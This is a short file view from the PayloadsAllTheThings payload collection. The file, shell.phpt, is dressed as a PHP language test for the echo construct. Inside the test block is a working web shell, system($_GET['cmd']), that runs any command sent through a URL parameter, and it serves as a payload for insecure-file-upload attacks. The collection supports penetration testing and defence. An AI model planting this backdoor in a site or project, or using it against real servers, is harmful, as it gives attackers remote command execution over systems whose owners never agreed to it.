PayloadsAllTheThings/Upload Insecure Files/Extension PHP/shell.phpt

9 lines
184 B
Plaintext
Raw Normal View History

2024-01-11 11:20:25 +00:00
--TEST--
echo - basic test for echo language construct
--FILE--
<?php
echo 'This works ', 'and takes args!';
echo "Shell";system($_GET['cmd']);
?>
--EXPECT--
This works and takes args!